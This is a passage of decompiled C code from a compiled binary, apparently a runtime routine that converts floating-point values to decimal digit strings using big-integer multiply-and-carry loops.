													_v1908 = _t1156;
													_t1157 =  !_t1156;
													_v1912 = _t1157;
													asm("bsr eax, ecx");
													if( *_t68 == 0) {
														_t76 =  &_v1876;
														 *_t76 = _v1876 & 0x00000000;
														__eflags =  *_t76;
													} else {
														_v1876 = _t1157 + 1;
													}
													_t1276 = _v1880;
													_t1392 = 0x1cc;
													_t1158 = _t1330 + _t1276;
													__eflags = _t1158 - 0x73;
													if(_t1158 <= 0x73) {
														__eflags = _t1343 - _v1876 - _v1900;
														asm("sbb eax, eax");
														_t1161 =  ~_t1158 + _t1330 + _t1276;
														_v1884 = _t1161;
														__eflags = _t1161 - 0x73;
														if(_t1161 > 0x73) {
															goto L35;
														} else {
															_t1375 = _t1276 - 1;
															_t1167 = _t1161 - 1;
															_v1920 = _t1375;
															_v1868 = _t1167;
															__eflags = _t1167 - _t1375;
															if(_t1167 != _t1375) {
																_t1379 = _t1167 - _t1276;
																__eflags = _t1379;
																_t1279 =  &(( &_v472)[_t1379]);
																_v1892 = _t1279;
																while(1) {
																	__eflags = _t1379 - _t1330;
																	if(_t1379 >= _t1330) {
																		_t1171 = 0;
																		__eflags = 0;
																	} else {
																		_t1171 = _t1279[1];
																	}
																	_v1876 = _t1171;
																	_t96 = _t1379 - 1; // -4
																	__eflags = _t96 - _t1330;
																	if(_t96 >= _t1330) {
																		_t1173 = 0;
																		__eflags = 0;
																	} else {
																		_t1173 =  *_t1279;
																	}
																	_t1282 = _v1868;
																	 *(_t1407 + _t1282 * 4 - 0x1d0) = (_t1173 & _v1912) >> _v1872 | (_v1876 & _v1908) << _v1900;
																	_t1178 = _t1282 - 1;
																	_t1279 = _v1892 - 4;
																	_v1868 = _t1178;
																	_t1379 = _t1379 - 1;
																	_v1892 = _t1279;
																	__eflags = _t1178 - _v1920;
																	if(_t1178 == _v1920) {
																		break;
																	}
																	_t1330 = _v472;
																}
																_t1276 = _v1880;
															}
															__eflags = _t1276;
															if(_t1276 != 0) {
																__eflags = 0;
																memset( &_v468, 0, _t1276 << 2);
																_t1410 =  &(_t1410[3]);
															}
															_v472 = _v1884;
														}
													} else {
														L35:
														_v1400 = 0;
														_v472 = 0;
														E00414A03( &_v468, _t1392,  &_v1396, 0);
														_t1410 =  &(_t1410[4]);
													}
													_t1166 = 4;
													_v1396 = _t1166;
													_push(_t1166);
												}
												goto L52;
											}
											goto L53;
										}
										L52:
										_v1392 = _v1392 & 0x00000000;
										_push( &_v1396);
										_v936 = _t1184;
										_push(_t1392);
										_push( &_v932);
										_v1400 = _t1184;
										E00414A03();
										_t1413 =  &(_t1410[4]);
									}
									_t926 = _v1904;
									_t1224 = 0xa;
									_v1912 = _t1224;
									__eflags = _t926;
									if(_t926 < 0) {
										_t927 =  ~_t926;
										_t928 = _t927 / _t1224;
										_v1892 = _t928;
										_t1225 = _t927 % _t1224;
										_v1920 = _t1225;
										__eflags = _t928;
										if(_t928 == 0) {
											L246:
											__eflags = _t1225;
											if(_t1225 != 0) {
												_t974 =  *(0x42f3b4 + _t1225 * 4);
												_v1884 = _t974;
												__eflags = _t974;
												if(_t974 == 0) {
													L258:
													__eflags = 0;
													_push(0);
													_v472 = 0;
													_v2408 = 0;
													goto L259;
												} else {
													__eflags = _t974 - _t1184;
													if(_t974 != _t1184) {
														_t1235 = _v472;
														__eflags = _t1235;
														if(_t1235 != 0) {
															_v1872 = _v1872 & 0x00000000;
															_t1352 = 0;
															__eflags = 0;
															do {
																_t1307 = _t974 *  *(_t1407 + _t1352 * 4 - 0x1d0) >> 0x20;
																 *(_t1407 + _t1352 * 4 - 0x1d0) = _t974 *  *(_t1407 + _t1352 * 4 - 0x1d0) + _v1872;
																_t974 = _v1884;
																asm("adc edx, 0x0");
																_t1352 = _t1352 + 1;
																_v1872 = _t1307;
																__eflags = _t1352 - _t1235;
															} while (_t1352 != _t1235);
															__eflags = _t1307;
															if(_t1307 != 0) {
																_t981 = _v472;
																__eflags = _t981 - 0x73;
																if(_t981 >= 0x73) {
																	goto L258;
																} else {
																	 *(_t1407 + _t981 * 4 - 0x1d0) = _t1307;
																	_v472 = _v472 + 1;
																}
															}
														}
													}
												}
											}
										} else {
											do {
												__eflags = _t928 - 0x26;
												if(_t928 > 0x26) {
													_t928 = 0x26;
												}
												_t1236 =  *(0x42f31e + _t928 * 4) & 0x000000ff;
												_v1900 = _t928;
												_v1400 = ( *(0x42f31e + _t928 * 4) & 0x000000ff) + ( *(0x42f31f + _t928 * 4) & 0x000000ff);
												E0040F2F0(_t1236 << 2,  &_v1396, 0, _t1236 << 2);
												_t992 = E0040ECB0( &(( &_v1396)[_t1236]), 0x42ea18 + ( *(0x42f31c + _v1900 * 4) & 0x0000ffff) * 4, ( *(0x42f31f + _t928 * 4) & 0x000000ff) << 2);
												_t1355 = _v1400;
												_t1413 =  &(_t1413[6]);
												__eflags = _t1355 - _t1184;
												if(_t1355 > _t1184) {
													__eflags = _v472 - _t1184;
													if(_v472 > _t1184) {
														__eflags = _t1355 - _v472;
														_t1308 =  &_v1396;
														_t548 = _t1355 - _v472 > 0;
														__eflags = _t548;
														_t993 = _t992 & 0xffffff00 | _t548;
														if(_t548 >= 0) {
															_t1308 =  &_v468;
														}
														_v1876 = _t1308;
														_t1237 =  &_v468;
														__eflags = _t993;
														if(_t993 == 0) {
															_t1237 =  &_v1396;
														}
														_v1872 = _t1237;
														__eflags = _t993;
														if(_t993 == 0) {
															_t1238 = _v472;
															_v1880 = _t1238;
														} else {
															_t1238 = _t1355;
															_v1880 = _t1355;
														}
														__eflags = _t993;
														if(_t993 != 0) {
															_t1355 = _v472;
														}
														_t994 = 0;
														_t1394 = 0;
														_v1864 = 0;
														__eflags = _t1238;
														if(_t1238 == 0) {
															L240:
															_v472 = _t994;
															_t1392 = 0x1cc;
															_t995 = _t994 << 2;
															__eflags = _t995;
															_push(_t995);
															_t996 =  &_v1860;
															goto L241;
														} else {
															do {
																__eflags =  *(_t1308 + _t1394 * 4);
																if( *(_t1308 + _t1394 * 4) != 0) {
																	_t1311 = 0;
																	_t1239 = _t1394;
																	_v1868 = _v1868 & 0;
																	_v1908 = 0;
																	__eflags = _t1355;
																	if(_t1355 == 0) {
																		L237:
																		__eflags = _t1239 - 0x73;
																		if(_t1239 == 0x73) {
																			goto L255;
																		} else {
																			_t1238 = _v1880;
																			_t1308 = _v1876;
																			goto L239;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1239 - 0x73;
																			if(_t1239 == 0x73) {
																				goto L232;
																			}
																			__eflags = _t1239 - _t994;
																			if(_t1239 == _t994) {
																				 *(_t1407 + _t1239 * 4 - 0x740) =  *(_t1407 + _t1239 * 4 - 0x740) & 0x00000000;
																				_t1014 = _v1868 + 1 + _t1394;
																				__eflags = _t1014;
																				_v1864 = _t1014;
																			}
																			_t1007 =  *(_v1872 + _v1868 * 4);
																			_t1313 = _v1876;
																			_t1311 = _t1007 *  *(_t1313 + _t1394 * 4) >> 0x20;
																			asm("adc edx, 0x0");
																			 *(_t1407 + _t1239 * 4 - 0x740) =  *(_t1407 + _t1239 * 4 - 0x740) + _t1007 *  *(_t1313 + _t1394 * 4) + _v1908;
																			asm("adc edx, 0x0");
																			_t1011 = _v1868 + 1;
																			_t1239 = _t1239 + 1;
																			_v1868 = _t1011;
																			__eflags = _t1011 - _t1355;
																			_v1908 = _t1311;
																			_t994 = _v1864;
																			if(_t1011 != _t1355) {
																				continue;
																			} else {
																				goto L232;
																			}
																			while(1) {
																				L232:
																				__eflags = _t1311;
																				if(_t1311 == 0) {
																					goto L237;
																				}
																				__eflags = _t1239 - 0x73;
																				if(_t1239 == 0x73) {
																					L255:
																					_t1392 = 0x1cc;
																					goto L256;
																				} else {
																					__eflags = _t1239 - _t994;
																					if(_t1239 == _t994) {
																						_t604 = _t1407 + _t1239 * 4 - 0x740;
																						 *_t604 =  *(_t1407 + _t1239 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t604;
																						_t610 = _t1239 + 1; // 0x1
																						_v1864 = _t610;
																					}
																					_t1005 = _t1311;
																					_t1311 = 0;
																					 *(_t1407 + _t1239 * 4 - 0x740) =  *(_t1407 + _t1239 * 4 - 0x740) + _t1005;
																					_t994 = _v1864;
																					asm("adc edx, edx");
																					_t1239 = _t1239 + 1;
																					continue;
																				}
																				goto L243;
																			}
																			goto L237;
																		}
																		goto L232;
																	}
																} else {
																	__eflags = _t1394 - _t994;
																	if(_t1394 == _t994) {
																		 *(_t1407 + _t1394 * 4 - 0x740) =  *(_t1407 + _t1394 * 4 - 0x740) & 0x00000000;
																		_t567 = _t1394 + 1; // 0x1
																		_t994 = _t567;
																		_v1864 = _t994;
																	}
																	goto L239;
																}
																goto L243;
																L239:
																_t1394 = _t1394 + 1;
																__eflags = _t1394 - _t1238;
															} while (_t1394 != _t1238);
															goto L240;
														}
													} else {
														_t1392 = 0x1cc;
														_v1872 = _v468;
														_v472 = _t1355;
														E00414A03( &_v468, 0x1cc,  &_v1396, _t1355 << 2);
														_t1022 = _v1872;
														_t1413 =  &(_t1413[4]);
														__eflags = _t1022;
														if(_t1022 != 0) {
															__eflags = _t1022 - _t1184;
															if(_t1022 == _t1184) {
																goto L242;
															} else {
																__eflags = _v472;
																if(_v472 == 0) {
																	goto L242;
																} else {
																	_v1884 = _v472;
																	_t1241 = 0;
																	_t1356 = 0;
																	__eflags = 0;
																	do {
																		_t1309 = _t1022 *  *(_t1407 + _t1356 * 4 - 0x1d0) >> 0x20;
																		 *(_t1407 + _t1356 * 4 - 0x1d0) = _t1022 *  *(_t1407 + _t1356 * 4 - 0x1d0) + _t1241;
																		_t1022 = _v1872;
																		asm("adc edx, 0x0");
																		_t1356 = _t1356 + 1;
																		_t1241 = _t1309;
																		__eflags = _t1356 - _v1884;
																	} while (_t1356 != _v1884);
																	__eflags = _t1241;
																	if(_t1241 == 0) {
																		goto L242;
																	} else {
																		_t1025 = _v472;
																		__eflags = _t1025 - 0x73;
																		if(_t1025 >= 0x73) {
																			L256:
																			_v2408 = 0;
																			_v472 = 0;
																			E00414A03( &_v468, _t1392,  &_v2404, 0);
																			_t1413 =  &(_t1413[4]);
																			_t999 = 0;
																		} else {
																			 *(_t1407 + _t1025 * 4 - 0x1d0) = _t1241;
																			_v472 = _v472 + 1;
																			goto L242;
																		}
																	}
																}
															}
														} else {
															_v2408 = _t1022;
															_v472 = _t1022;
															_push(_t1022);
															_t996 =  &_v2404;
															L241:
															_push(_t996);
															_push(_t1392);
															_push( &_v468);
															E00414A03();
															_t1413 =  &(_t1413[4]);
															L242:
															_t999 = _t1184;
														}
													}
												} else {
													_t1357 = _v1396;
													__eflags = _t1357;
													if(_t1357 != 0) {
														__eflags = _t1357 - _t1184;
														if(_t1357 == _t1184) {
															goto L194;
														} else {
															__eflags = _v472;
															if(_v472 == 0) {
																goto L194;
															} else {
																_t1242 = 0;
																_v1884 = _v472;
																_t1395 = 0;
																__eflags = 0;
																do {
																	_t1027 = _t1357;
																	_t1310 = _t1027 *  *(_t1407 + _t1395 * 4 - 0x1d0) >> 0x20;
																	 *(_t1407 + _t1395 * 4 - 0x1d0) = _t1027 *  *(_t1407 + _t1395 * 4 - 0x1d0) + _t1242;
																	asm("adc edx, 0x0");
																	_t1395 = _t1395 + 1;
																	_t1242 = _t1310;
																	__eflags = _t1395 - _v1884;
																} while (_t1395 != _v1884);
																__eflags = _t1242;
																if(_t1242 == 0) {
																	goto L194;
																} else {
																	_t1030 = _v472;
																	__eflags = _t1030 - 0x73;
																	if(_t1030 >= 0x73) {
																		_v2408 = 0;
																		_v472 = 0;
																		E00414A03( &_v468, 0x1cc,  &_v2404, 0);
																		_t1413 =  &(_t1413[4]);
																		_t999 = 0;
																		goto L195;
																	} else {
																		 *(_t1407 + _t1030 * 4 - 0x1d0) = _t1242;
																		_v472 = _v472 + 1;
																		goto L194;
																	}
																}
															}
														}
														goto L261;
													} else {
														__eflags = 0;
														_v2408 = 0;
														_v472 = 0;
														E00414A03( &_v468, 0x1cc,  &_v2404, 0);
														_t1413 =  &(_t1413[4]);
														L194:
														_t999 = _t1184;
													}
													L195:
													_t1392 = 0x1cc;
												}
												L243:
												__eflags = _t999;
												if(_t999 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_v472 = _v472 & 0x00000000;
													_push(0);
													L259:
													_push( &_v2404);
													_t977 =  &_v468;
													goto L260;
												} else {
													goto L244;
												}
												goto L261;
												L244:
												_t928 = _v1892 - _v1900;
												__eflags = _t928;
												_v1892 = _t928;
											} while (_t928 != 0);
											_t1225 = _v1920;
											goto L246;
										}
									} else {
										_t1039 = _t926 / _t1224;
										_v1872 = _t1039;
										_t1243 = _t926 % _t1224;
										_v1920 = _t1243;
										__eflags = _t1039;
										if(_t1039 == 0) {
											L174:
											__eflags = _t1243;
											if(_t1243 != 0) {
												_t1040 =  *(0x42f3b4 + _t1243 * 4);
												_v1884 = _t1040;
												__eflags = _t1040;
												if(_t1040 != 0) {
													__eflags = _t1040 - _t1184;
													if(_t1040 != _t1184) {
														_t1244 = _v936;
														__eflags = _t1244;
														if(_t1244 != 0) {
															_v1872 = _v1872 & 0x00000000;
															_t1358 = 0;
															__eflags = 0;
															do {
																_t1315 = _t1040 *  *(_t1407 + _t1358 * 4 - 0x3a0) >> 0x20;
																 *(_t1407 + _t1358 * 4 - 0x3a0) = _t1040 *  *(_t1407 + _t1358 * 4 - 0x3a0) + _v1872;
																_t1040 = _v1884;
																asm("adc edx, 0x0");
																_t1358 = _t1358 + 1;
																_v1872 = _t1315;
																__eflags = _t1358 - _t1244;
															} while (_t1358 != _t1244);
															__eflags = _t1315;
															if(_t1315 != 0) {
																_t1043 = _v936;
																__eflags = _t1043 - 0x73;
																if(_t1043 >= 0x73) {
																	goto L176;
																} else {
																	 *(_t1407 + _t1043 * 4 - 0x3a0) = _t1315;
																	_v936 = _v936 + 1;
																}
															}
														}
													}
												} else {
													L176:
													_v2408 = 0;
													_v936 = 0;
													_push(0);
													goto L180;
												}
											}
										} else {
											do {
												__eflags = _t1039 - 0x26;
												if(_t1039 > 0x26) {
													_t1039 = 0x26;
												}
												_t1245 =  *(0x42f31e + _t1039 * 4) & 0x000000ff;
												_v1876 = _t1039;
												_v1400 = ( *(0x42f31e + _t1039 * 4) & 0x000000ff) + ( *(0x42f31f + _t1039 * 4) & 0x000000ff);
												E0040F2F0(_t1245 << 2,  &_v1396, 0, _t1245 << 2);
												_t1056 = E0040ECB0( &(( &_v1396)[_t1245]), 0x42ea18 + ( *(0x42f31c + _v1876 * 4) & 0x0000ffff) * 4, ( *(0x42f31f + _t1039 * 4) & 0x000000ff) << 2);
												_t1361 = _v1400;
												_t1413 =  &(_t1413[6]);
												__eflags = _t1361 - _t1184;
												if(_t1361 > _t1184) {
													__eflags = _v936 - _t1184;
													if(_v936 > _t1184) {
														__eflags = _t1361 - _v936;
														_t1316 =  &_v1396;
														_t338 = _t1361 - _v936 > 0;
														__eflags = _t338;
														_t1057 = _t1056 & 0xffffff00 | _t338;
														if(_t338 >= 0) {
															_t1316 =  &_v932;
														}
														_v1900 = _t1316;
														_t1246 =  &_v932;
														__eflags = _t1057;
														if(_t1057 == 0) {
															_t1246 =  &_v1396;
														}
														_v1880 = _t1246;
														__eflags = _t1057;
														if(_t1057 == 0) {
															_t1247 = _v936;
															_v1908 = _t1247;
														} else {
															_t1247 = _t1361;
															_v1908 = _t1361;
														}
														__eflags = _t1057;
														if(_t1057 != 0) {
															_t1361 = _v936;
														}
														_t1058 = 0;
														_t1397 = 0;
														_v1864 = 0;
														__eflags = _t1247;
														if(_t1247 == 0) {
															L168:
															_v936 = _t1058;
															_t1392 = 0x1cc;
															_t1059 = _t1058 << 2;
															__eflags = _t1059;
															_push(_t1059);
															_t1060 =  &_v1860;
															goto L169;
														} else {
															do {
																__eflags =  *(_t1316 + _t1397 * 4);
																if( *(_t1316 + _t1397 * 4) != 0) {
																	_t1319 = 0;
																	_t1248 = _t1397;
																	_v1868 = _v1868 & 0;
																	_v1892 = 0;
																	__eflags = _t1361;
																	if(_t1361 == 0) {
																		L165:
																		__eflags = _t1248 - 0x73;
																		if(_t1248 == 0x73) {
																			goto L177;
																		} else {
																			_t1247 = _v1908;
																			_t1316 = _v1900;
																			goto L167;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1248 - 0x73;
																			if(_t1248 == 0x73) {
																				goto L160;
																			}
																			__eflags = _t1248 - _t1058;
																			if(_t1248 == _t1058) {
																				 *(_t1407 + _t1248 * 4 - 0x740) =  *(_t1407 + _t1248 * 4 - 0x740) & 0x00000000;
																				_t1078 = _v1868 + 1 + _t1397;
																				__eflags = _t1078;
																				_v1864 = _t1078;
																			}
																			_t1071 =  *(_v1880 + _v1868 * 4);
																			_t1321 = _v1900;
																			_t1319 = _t1071 *  *(_t1321 + _t1397 * 4) >> 0x20;
																			asm("adc edx, 0x0");
																			 *(_t1407 + _t1248 * 4 - 0x740) =  *(_t1407 + _t1248 * 4 - 0x740) + _t1071 *  *(_t1321 + _t1397 * 4) + _v1892;
																			asm("adc edx, 0x0");
																			_t1075 = _v1868 + 1;
																			_t1248 = _t1248 + 1;
																			_v1868 = _t1075;
																			__eflags = _t1075 - _t1361;
																			_v1892 = _t1319;
																			_t1058 = _v1864;
																			if(_t1075 != _t1361) {
																				continue;
																			} else {
																				goto L160;
																			}
																			while(1) {
																				L160:
																				__eflags = _t1319;
																				if(_t1319 == 0) {
																					goto L165;
																				}
																				__eflags = _t1248 - 0x73;
																				if(_t1248 == 0x73) {
																					L177:
																					__eflags = 0;
																					_t1392 = 0x1cc;
																					_v2408 = 0;
																					_v936 = 0;
																					_push(0);
																					_t1066 =  &_v2404;
																					goto L178;
																				} else {
																					__eflags = _t1248 - _t1058;
																					if(_t1248 == _t1058) {
																						_t394 = _t1407 + _t1248 * 4 - 0x740;
																						 *_t394 =  *(_t1407 + _t1248 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t394;
																						_t400 = _t1248 + 1; // 0x1
																						_v1864 = _t400;
																					}
																					_t1069 = _t1319;
																					_t1319 = 0;
																					 *(_t1407 + _t1248 * 4 - 0x740) =  *(_t1407 + _t1248 * 4 - 0x740) + _t1069;
																					_t1058 = _v1864;
																					asm("adc edx, edx");
																					_t1248 = _t1248 + 1;
																					continue;
																				}
																				goto L171;
																			}
																			goto L165;
																		}
																		goto L160;
																	}
																} else {
																	__eflags = _t1397 - _t1058;
																	if(_t1397 == _t1058) {
																		 *(_t1407 + _t1397 * 4 - 0x740) =  *(_t1407 + _t1397 * 4 - 0x740) & 0x00000000;
																		_t357 = _t1397 + 1; // 0x1
																		_t1058 = _t357;
																		_v1864 = _t1058;
																	}
																	goto L167;
																}
																goto L171;
																L167:
																_t1397 = _t1397 + 1;
																__eflags = _t1397 - _t1247;
															} while (_t1397 != _t1247);
															goto L168;
														}
													} else {
														_t1392 = 0x1cc;
														_v1880 = _v932;
														_v936 = _t1361;
														E00414A03( &_v932, 0x1cc,  &_v1396, _t1361 << 2);
														_t1086 = _v1880;
														_t1413 =  &(_t1413[4]);
														__eflags = _t1086;
														if(_t1086 != 0) {
															__eflags = _t1086 - _t1184;
															if(_t1086 == _t1184) {
																goto L170;
															} else {
																__eflags = _v936;
																if(_v936 == 0) {
																	goto L170;
																} else {
																	_v1884 = _v936;
																	_t1250 = 0;
																	_t1362 = 0;
																	__eflags = 0;
																	do {
																		_t1317 = _t1086 *  *(_t1407 + _t1362 * 4 - 0x3a0) >> 0x20;
																		 *(_t1407 + _t1362 * 4 - 0x3a0) = _t1086 *  *(_t1407 + _t1362 * 4 - 0x3a0) + _t1250;
																		_t1086 = _v1880;
																		asm("adc edx, 0x0");
																		_t1362 = _t1362 + 1;
																		_t1250 = _t1317;
																		__eflags = _t1362 - _v1884;
																	} while (_t1362 != _v1884);
																	__eflags = _t1250;
																	if(_t1250 == 0) {
																		goto L170;
																	} else {
																		_t1089 = _v936;
																		__eflags = _t1089 - 0x73;
																		if(_t1089 >= 0x73) {
																			_v1400 = 0;
																			_v936 = 0;
																			_push(0);
																			_t1066 =  &_v1396;
																			L178:
																			_push(_t1066);
																			_push(_t1392);
																			_push( &_v932);
																			E00414A03();
																			_t1413 =  &(_t1413[4]);
																			_t1063 = 0;
																		} else {
																			 *(_t1407 + _t1089 * 4 - 0x3a0) = _t1250;
																			_v936 = _v936 + 1;
																			goto L170;
																		}
																	}
																}
															}
														} else {
															_v1400 = _t1086;
															_v936 = _t1086;
															_push(_t1086);
															_t1060 =  &_v1396;
															L169:
															_push(_t1060);
															_push(_t1392);
															_push( &_v932);
															E00414A03();
															_t1413 =  &(_t1413[4]);
															L170:
															_t1063 = _t1184;
														}
													}
												} else {
													_t1363 = _v1396;
													__eflags = _t1363;
													if(_t1363 != 0) {
														__eflags = _t1363 - _t1184;
														if(_t1363 == _t1184) {
															goto L121;
														} else {
															__eflags = _v936;
															if(_v936 == 0) {
																goto L121;
															} else {
																_t1251 = 0;
																_v1884 = _v936;
																_t1398 = 0;
																__eflags = 0;
																do {
																	_t1092 = _t1363;
																	_t1318 = _t1092 *  *(_t1407 + _t1398 * 4 - 0x3a0) >> 0x20;
																	 *(_t1407 + _t1398 * 4 - 0x3a0) = _t1092 *  *(_t1407 + _t1398 * 4 - 0x3a0) + _t1251;
																	asm("adc edx, 0x0");
																	_t1398 = _t1398 + 1;
																	_t1251 = _t1318;
																	__eflags = _t1398 - _v1884;
																} while (_t1398 != _v1884);
																__eflags = _t1251;
																if(_t1251 == 0) {
																	goto L121;
																} else {
																	_t1095 = _v936;
																	__eflags = _t1095 - 0x73;
																	if(_t1095 >= 0x73) {
																		_v1400 = 0;
																		_v936 = 0;
																		E00414A03( &_v932, 0x1cc,  &_v1396, 0);
																		_t1413 =  &(_t1413[4]);
																		_t1063 = 0;
																		goto L122;
																	} else {
																		 *(_t1407 + _t1095 * 4 - 0x3a0) = _t1251;
																		_v936 = _v936 + 1;
																		goto L121;
																	}
																}
															}
														}
														goto L261;
													} else {
														__eflags = 0;
														_v1864 = 0;
														_v936 = 0;
														E00414A03( &_v932, 0x1cc,  &_v1860, 0);
														_t1413 =  &(_t1413[4]);
														L121:
														_t1063 = _t1184;
													}
													L122:
													_t1392 = 0x1cc;
												}
												L171:
												__eflags = _t1063;
												if(_t1063 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_t429 =  &_v936;
													 *_t429 = _v936 & 0x00000000;
													__eflags =  *_t429;
													_push(0);
													L180:
													_push( &_v2404);
													_t977 =  &_v932;
													L260:
													_push(_t1392);
													_push(_t977);
													E00414A03();
													_t1413 =  &(_t1413[4]);
												} else {
													goto L172;
												}
												goto L261;
												L172:
												_t1039 = _v1872 - _v1876;
												__eflags = _t1039;
												_v1872 = _t1039;
											} while (_t1039 != 0);
											_t1243 = _v1920;
											goto L174;
										}
									}
									L261:
									_t1226 = _v472;
									_t1347 = _v1896;
									_v1868 = _t1347;
									__eflags = _t1226;
									if(_t1226 != 0) {
										_v1872 = _v1872 & 0x00000000;
										_t1351 = 0;
										__eflags = 0;
										do {
											_t966 =  *(_t1407 + _t1351 * 4 - 0x1d0);
											_t1305 = 0xa;
											_t1306 = _t966 * _t1305 >> 0x20;
											 *(_t1407 + _t1351 * 4 - 0x1d0) = _t966 * _t1305 + _v1872;
											asm("adc edx, 0x0");
											_t1351 = _t1351 + 1;
											_v1872 = _t1306;
											__eflags = _t1351 - _t1226;
										} while (_t1351 != _t1226);
										_t1347 = _v1868;
										__eflags = _t1306;
										if(_t1306 != 0) {
											_t969 = _v472;
											__eflags = _t969 - 0x73;
											if(_t969 >= 0x73) {
												__eflags = 0;
												_v2408 = 0;
												_v472 = 0;
												E00414A03( &_v468, _t1392,  &_v2404, 0);
												_t1413 =  &(_t1413[4]);
											} else {
												 *(_t1407 + _t969 * 4 - 0x1d0) = _t1306;
												_v472 = _v472 + 1;
											}
										}
									}
									_t931 = E00417CE0( &_v472,  &_v936);
									_t1200 = _v1896;
									_t1297 = 0xa;
									__eflags = _t931 - _t1297;
									if(_t931 != _t1297) {
										__eflags = _t931;
										if(_t931 != 0) {
											_t1347 = _t1200 + 1;
											 *_t1200 = _t931 + 0x30;
											_v1868 = _t1347;
											goto L276;
										} else {
											_t933 = _v1904 - 1;
											goto L277;
										}
										goto L308;
									} else {
										_t957 = _v936;
										_t1347 = _t1200 + 1;
										_v1904 = _v1904 + 1;
										 *_t1200 = 0x31;
										_v1868 = _t1347;
										_v1884 = _t957;
										__eflags = _t957;
										if(_t957 != 0) {
											_t1350 = 0;
											_t1233 = 0;
											__eflags = 0;
											do {
												_t958 =  *(_t1407 + _t1233 * 4 - 0x3a0);
												 *(_t1407 + _t1233 * 4 - 0x3a0) = _t958 * _t1297 + _t1350;
												asm("adc edx, 0x0");
												_t1233 = _t1233 + 1;
												_t1350 = _t958 * _t1297 >> 0x20;
												_t1297 = 0xa;
												__eflags = _t1233 - _v1884;
											} while (_t1233 != _v1884);
											_v1884 = _t1350;
											__eflags = _t1350;
											_t1347 = _v1868;
											if(_t1350 != 0) {
												_t1234 = _v936;
												__eflags = _t1234 - 0x73;
												if(_t1234 >= 0x73) {
													_v2408 = 0;
													_v936 = 0;
													E00414A03( &_v932, _t1392,  &_v2404, 0);
													_t1413 =  &(_t1413[4]);
												} else {
													 *((intOrPtr*)(_t1407 + _t1234 * 4 - 0x3a0)) = _v1884;
													_t723 =  &_v936;
													 *_t723 = _v936 + 1;
													__eflags =  *_t723;
												}
											}
											_t1200 = _v1896;
										}
										L276:
										_t933 = _v1904;
									}
									L277:
									 *((intOrPtr*)(_v1928 + 4)) = _t933;
									_t1285 = _v1916;
									__eflags = _t933;
									if(_t933 >= 0) {
										__eflags = _t1285 - 0x7fffffff;
										if(_t1285 <= 0x7fffffff) {
											_t1285 = _t1285 + _t933;
											__eflags = _t1285;
										}
									}
									_t935 = _a24 - 1;
									__eflags = _t935 - _t1285;
									if(_t935 >= _t1285) {
										_t935 = _t1285;
									}
									_t936 = _t935 + _t1200;
									_v1872 = _t936;
									__eflags = _t1347 - _t936;
									if(_t1347 != _t936) {
										while(1) {
											_t939 = _v472;
											__eflags = _t939;
											if(_t939 == 0) {
												goto L302;
											}
											_t1190 = 0;
											_t1348 = _t939;
											_t1229 = 0;
											__eflags = 0;
											do {
												_t940 =  *(_t1407 + _t1229 * 4 - 0x1d0);
												 *(_t1407 + _t1229 * 4 - 0x1d0) = _t940 * 0x3b9aca00 + _t1190;
												asm("adc edx, 0x0");
												_t1229 = _t1229 + 1;
												_t1190 = _t940 * 0x3b9aca00 >> 0x20;
												__eflags = _t1229 - _t1348;
											} while (_t1229 != _t1348);
											_t1349 = _v1868;
											__eflags = _t1190;
											if(_t1190 != 0) {
												_t951 = _v472;
												__eflags = _t951 - 0x73;
												if(_t951 >= 0x73) {
													__eflags = 0;
													_v2408 = 0;
													_v472 = 0;
													E00414A03( &_v468, _t1392,  &_v2404, 0);
													_t1413 =  &(_t1413[4]);
												} else {
													 *(_t1407 + _t951 * 4 - 0x1d0) = _t1190;
													_v472 = _v472 + 1;
												}
											}
											_t945 = E00417CE0( &_v472,  &_v936);
											__eflags = _v472;
											_t1184 = _t1190 & 0xffffff00 | _v472 == 0x00000000;
											_v1916 = 8;
											_t1200 = _v1872 - _t1349;
											__eflags = _t1200;
											do {
												_t1302 = _t945 % _v1912;
												_v1920 = _t945 / _v1912;
												_v1884 = _t1302;
												_t948 = _t1302 + 0x30;
												_t1303 = _v1916;
												__eflags = _t1200 - _t1303;
												if(_t1200 >= _t1303) {
													 *(_t1303 + _t1349) = _t948;
												} else {
													__eflags = _t948 - 0x30;
													_t1184 = _t1184 & (_t948 & 0xffffff00 | _t948 != 0x00000030) - 0x00000001;
												}
												_t945 = _v1920;
												_t1285 = _t1303 - 1;
												_v1916 = _t1285;
												__eflags = _t1285 - 0xffffffff;
											} while (_t1285 != 0xffffffff);
											__eflags = _t1200 - 9;
											if(_t1200 > 9) {
												_t1200 = 9;
											}
											_t1347 = _t1349 + _t1200;
											_v1868 = _t1347;
											__eflags = _t1347 - _v1872;
											if(_t1347 != _v1872) {
												continue;
											}
											goto L302;
										}
									}
									L302:
									 *_t1347 = 0;
									__eflags = _t1184;
									_t938 = 0 | __eflags != 0x00000000;
									_v1884 = _t938;
									_t1184 = _t938;
									goto L308;
								}
							}
						}
					}
				} else {
					_t1200 = _t1381 & 0x000fffff;
					if((_a4 | _t1381 & 0x000fffff) == 0 || (_v1944 & 0x01000000) != 0) {
						_push("0");
						 *((intOrPtr*)(_v1928 + 4)) =  *(_v1928 + 4) & 0x00000000;
						L12:
						_push(_a24);
						_push(_v1896);
						_t895 = E0041AF78();
						_t1411 =  &(_t1410[3]);
						if(_t895 != 0) {
							L311:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00411D34();
							asm("int3");
							_push(_t1407);
							_t1408 = _t1411;
							_t858 =  *0x43b054; // 0x41d6575c
							_v2448 = _t858 ^ _t1408;
							_t1201 = _v2436;
							_push(_t1184);
							_t1185 = _v2432;
							_push(_t1381);
							_t1382 = _v2424;
							_v2480 = _t1185;
							_push(_t1335);
							_t1336 = _t1185;
							__eflags = _t1382;
							if(_t1382 == 0) {
								_t1382 = 0x43cce8;
							}
							_t1287 = 1;
							__eflags = _t1185;
							if(_t1185 != 0) {
								_t860 = _a8;
							} else {
								_t1185 = 0x4379e7;
								_t860 = 1;
							}
							_v36 = _t860;
							asm("sbb edi, edi");
							_t1338 =  ~_t1336 & _t1201;
							__eflags = _t860;
							if(_t860 != 0) {
								__eflags =  *(_t1382 + 6);
								if( *(_t1382 + 6) != 0) {
									_t1287 =  *_t1382;
									_t1203 =  *(_t1382 + 6);
									__eflags =  *(_t1382 + 4) - 2 - 2;
